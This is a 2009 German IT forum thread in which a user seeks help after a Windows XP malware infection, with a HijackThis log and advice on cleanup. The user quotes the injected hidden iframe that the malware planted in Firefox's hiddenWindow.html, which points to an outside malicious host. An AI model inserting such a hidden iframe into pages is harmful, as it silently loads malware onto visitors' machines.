Zum Inhalt springen

Firefox Warnung: Attackierende Seite


dan!eL

Empfohlene Beiträge

hallo zusammen,

ja mir ist tatsächlich passiert - ich der jemand predigt keine unbekannten anhänge zu öffnen. hatte die datei vorher gründlichst untersucht und durch einen virenscan laufen lassen, habe sie jedoch ausgeführt (name der *.exe) weiß ich nicht mehr.

nun kommt bei mir jedesmal eine warnmeldung (ich nehme an phishing warnung) wenn ich firefox starte:

imgimg.de - Dein Bilderhoster zum Bilder hochladen - hmm7768585eJPG.jpg

habe anschließend eine intensivprüfung des systems laufen lassen und es wurde auch einiges behoben. zudem habe im firefox verzeichnis (C:\Programme\Mozilla Firefox\res\) die file hiddenWindow.html so bearbeitet, dass kein iframe darin vorkommt (noscript addon springt darauf an).

wie bekomme ich diese warnmeldung weg? das system ist auf dem neusten stand. winXP prof. sp3, firefox 3.0.11

//edit

habe die datei oben anschließend auf schreibgeschützt gemacht und firefox neu gestartet. siehe da, der eintrag ist wieder vorhanden. wie ist sowas möglich?

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Bearbeitet von dan!eL
Link zu diesem Kommentar
Auf anderen Seiten teilen

so bin wieder da. hier die aktuelle log von hijackthis

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 11:34:50, on 18.07.2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v8.00 (8.00.6001.18702)

Boot mode: Normal


Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\system32\svchost.exe

C:\Programme\Windows Defender\MsMpEng.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedul2.exe

C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe

C:\Programme\G DATA\TotalCare\AVK\AVKService.exe

C:\Programme\G DATA\TotalCare\AVK\AVKWCtl.exe

C:\Programme\Java\jre6\bin\jqs.exe

C:\Programme\Gemeinsame Dateien\Nero\Nero BackItUp 4\NBService.exe

C:\WINDOWS\system32\oodag.exe

C:\Programme\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\TUProgSt.exe

C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe

C:\WINDOWS\system32\wbem\wmiapsrv.exe

C:\Programme\G DATA\TotalCare\Firewall\GDFwSvc.exe

C:\WINDOWS\system32\wscntfy.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\RUNDLL32.EXE

C:\Programme\G DATA\TotalCare\Firewall\GDFirewallTray.exe

C:\Programme\G DATA\TotalCare\AVKTray\AVKTray.exe

C:\WINDOWS\RTHDCPL.exe

C:\WINDOWS\pchealth\helpctr\binaries\helpctr.exe

C:\Programme\G DATA\TotalCare\AVKTuner\AVKTunerService.exe

C:\Programme\Mozilla Firefox\firefox.exe

C:\Programme\HijackThis\HijackThis.exe


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://windowsupdate.microsoft.com/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

O2 - BHO: G DATA WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - C:\Programme\G DATA\TotalCare\Webfilter\AVKWebIE.dll

O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll

O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre6\bin\ssv.dll

O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O3 - Toolbar: DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Programme\DAEMON Tools Toolbar\DTToolbar.dll

O3 - Toolbar: G DATA WebFilter - {0124123D-61B4-456f-AF86-78C53A0790C5} - C:\Programme\G DATA\TotalCare\Webfilter\AVKWebIE.dll

O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE

O4 - HKLM\..\Run: [nwiz] nwiz.exe /install

O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit

O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup

O4 - HKLM\..\Run: [GDFirewallTray] C:\Programme\G DATA\TotalCare\Firewall\GDFirewallTray.exe

O4 - HKLM\..\Run: [G DATA AntiVirus Trayapplication] C:\Programme\G DATA\TotalCare\AVKTray\AVKTray.exe

O4 - HKCU\..\Run: [QIP2005] C:\Programme\QIP\qip.exe

O4 - HKCU\..\Run: [Realtek HD Audio Control Panel] C:\WINDOWS\RTHDCPL.exe

O4 - HKCU\..\Run: [CSSM] "C:\Programme\CSSM\CSSM.exe" /B

O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Programme\Alcohol Soft\Alcohol 120\axcmd.exe" /automount

O4 - HKCU\..\Run: [DAEMON Tools Lite] C:\Programme\DAEMON Tools Lite\daemon.exe -autorun

O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O8 - Extra context menu item: Nach Microsoft E&xel exportieren - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000

O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll

O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe

O16 - DPF: {67A5F8DC-1A4B-4D66-9F24-A704AD929EEE} (System Requirements Lab) - http://www.nvidia.com/content/DriverDownload/srl/2.0.0.1/sysreqlab2.cab

O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1210885982515

O16 - DPF: {74DBCB52-F298-4110-951D-AD2FF67BC8AB} (NVIDIA Smart Scan) - http://www.nvidia.com/content/DriverDownload/nforce/NvidiaSmartScan.cab

O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab

O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab

O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL

O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedul2.exe

O23 - Service: G Data AntiVirus Proxy (AVKProxy) - G DATA Software AG - C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe

O23 - Service: G Data Scheduler (AVKService) - G Data Software AG - C:\Programme\G DATA\TotalCare\AVK\AVKService.exe

O23 - Service: G Data Dateisystem Wächter (AVKWCtl) - G Data Software AG - C:\Programme\G DATA\TotalCare\AVK\AVKWCtl.exe

O23 - Service: G Data Backup Service - G Data Software AG - C:\Programme\G DATA\TotalCare\AVKBackup\AVKBackupService.exe

O23 - Service: G Data Tuner Service - G Data Software AG - C:\Programme\G DATA\TotalCare\AVKTuner\AVKTunerService.exe

O23 - Service: G Data Personal Firewall (GDFwSvc) - G Data Software AG - C:\Programme\G DATA\TotalCare\Firewall\GDFwSvc.exe

O23 - Service: G Data Scanner (GDScan) - G DATA Software AG - C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe

O23 - Service: HLYMS - Unknown owner - C:\DOKUME~1\THUNDE~1\LOKALE~1\Temp\HLYMS.exe (file missing)

O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe

O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Programme\Java\jre6\bin\jqs.exe

O23 - Service: Nero BackItUp Scheduler 4.0 - Nero AG - C:\Programme\Gemeinsame Dateien\Nero\Nero BackItUp 4\NBService.exe

O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

O23 - Service: O&O Defrag - O&O Software GmbH - C:\WINDOWS\system32\oodag.exe

O23 - Service: StarWind AE Service (StarWindServiceAE) - Rocket Division Software - C:\Programme\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe

O23 - Service: TuneUp Drive Defrag-Dienst (TuneUp.Defrag) - TuneUp Software - C:\WINDOWS\System32\TuneUpDefragService.exe

O23 - Service: TuneUp Program Statistics Service (TuneUp.ProgramStatisticsSvc) - TuneUp Software - C:\WINDOWS\System32\TUProgSt.exe


--

End of file - 8062 bytes

zu den wehweh'chen kommt, dass seit dieser aktion (post #1) das windows "dateiausführungsverhinderung-programm" nach dem start direkt in windows sämtliche programme blockiert. das beinhaltet autostartporgramme und dienste. eine windows-hilfe dazu lässt sich im allgemeinen auch nicht mehr öffnen, das proggy hatte ich vorher jedoch nicht aktiviert.

Link zu diesem Kommentar
Auf anderen Seiten teilen

zur Info:

Die Hijackthis-Logdatei kannst du auch parallel bei http://www.hijackthis.de/ automatisiert auswerten lassen.

danke dir, gar nicht gewusst. sind 2 einträge vorhanden, die wohl nicht sein sollten.

bekämpfe den schädling auf dem system mit diversen programmen. sehe es nicht ein mein system neu aufzusetzen.

- malwarebytes

- spybot

- ad aware

- stopzilla

- paretologic av plus

- gdata av

hab mir den reader_s eingefangen. läd auch ständig schadcode ausm inet nach, habe deshalb bei dem infizierten rechner das kabel gezogen ;)

es lassen sich dort keine inet verbindungen zur div. antiviren-seiten wie z.b. gdata, kaspersky, .. aufbauen und geschweige denn die programme updaten.

das wird ein kampf der vor genau 19 minuten begonnen hat und heute nachmittag spästens (hoffentlich positiv) für mich enden wird.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Mit einem solchen Vorgehen entfernst du nur die dem verwendeten Tool bekannten bösartige Programme. Woher willst du wissen, ob nicht auch diesem Tool unbekannte Viren/Trojaner/... drauf sind oder Systemdateien manipuliert wurden? Das einzig saubere ist plattmachen und neu aufsetzen.

Link zu diesem Kommentar
Auf anderen Seiten teilen

@allesweg

nachdem ich mit dieser Empfehlung hier auch schon Widerspruch geerntet habe, hier eine nicht ganz so weitgehende Empfehlung. Boote das System von einer Boot-CD, wie der c't Notfall CD und scanne es von dort aus. So kannst du auch den Virenscanner gefahrlos aktualisieren.

Link zu diesem Kommentar
Auf anderen Seiten teilen

@allesweg

nachdem ich mit dieser Empfehlung hier auch schon Widerspruch geerntet habe, hier eine nicht ganz so weitgehende Empfehlung. Boote das System von einer Boot-CD, wie der c't Notfall CD und scanne es von dort aus. So kannst du auch den Virenscanner gefahrlos aktualisieren.

das werde ich auf jeden fall versuchen, ging mir auch schon durch den kopf.

Link zu diesem Kommentar
Auf anderen Seiten teilen

  • 3 Wochen später...

der kampf geht weiter...

ich habe zunächst mehrmals knoppicillin und die gdata antiviren-live-boot cd drüberlaufen lassen. hier wurde einiges entdeckt und entsprechend behoben. darunter litt auch die userinit.exe aus dem system32 verzeichnis. resultat: egal mit welchem user ich mich nach einem normalen (re)boot im windows anmelde, wird dieser sofort wieder abgemeldet. hm ich dachte mir es liegt an der besagten .exe die auch nicht mehr vorhanden war. habe dann mit knoppix gebootet und die userinit.exe manuell von einem stick in das systemverzeichnis kopiert und es erneut versucht mich anzumelden. wieder nicht möglich.

nun habe ich mich ein wenig schlauer gemacht und bin auf folgende seiten gestoßen und habe auch schon entsprechende schritte eingeleitet:

USERINIT.exe gelöscht und komme nicht mehr zu meinen daten - PC-WELT - FORUM

Win XP: Nach Anmeldung, sofort wieder Abmeldung!?? (Seite 1) - Computerhilfen.de

wie jedoch komme ich denn an meine registry, wenn ich keinen zugriff auf einen win-user habe, falls im falle eines falles der pfad des eintrags der reg wirklich vermurkst wurde?

das mit der Bart-PE-CD hat bei mir auch nciht wirklich gefunzt. die cd wurde zwar normal gebrannt, aber nicht als bootfähig erkannt.

das system möchte ich nicht neu aufsetzen bevor win7 nicht released ist. bis dahin ist es zwar nicht mehr so lange, möchte jedoch ganz gerne den rechner wieder nutzen ;)

Bearbeitet von dan!eL
Link zu diesem Kommentar
Auf anderen Seiten teilen

Dein System ist eigentlich FUBAR. ;-)

Die Registry kannst du eventuell von einem anderen PC aus bearbeiten. Dazu auf diesem Regedit starten. Dann Datei - Mit Netzwerkregistrierung verbinden.

Benutzen kannst du den Rechner auf jeden Fall temporär mit einer Live-CD wie Knoppix.

Zur bootfähigen bart-PE CD: Du darfst nicht einfach nur das ISO drauf brennen (als Datei) sondern mußt in deinem Brennprogramm auswählen ein Image zu brennen. Oder du nimmst gleich ImgBurn.

Wenn du dann schließlich Windows 7 installierst: Formatiere auf jeden Fall vorher die Festplatte, damit sicher alles weg ist.

Link zu diesem Kommentar
Auf anderen Seiten teilen

  • 3 Wochen später...
  • 3 Wochen später...
  • 3 Wochen später...

Dein Kommentar

Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung wiederherstellen

  Nur 75 Emojis sind erlaubt.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

Fachinformatiker.de, 2024 by SE Internet Services

fidelogo_small.png

Schicke uns eine Nachricht!

Fachinformatiker.de ist die größte IT-Community
rund um Ausbildung, Job, Weiterbildung für IT-Fachkräfte.

Fachinformatiker.de App

Download on the App Store
Get it on Google Play

Kontakt

Hier werben?
Oder sende eine E-Mail an

Social media u. feeds

Jobboard für Fachinformatiker und IT-Fachkräfte

×
×
  • Neu erstellen...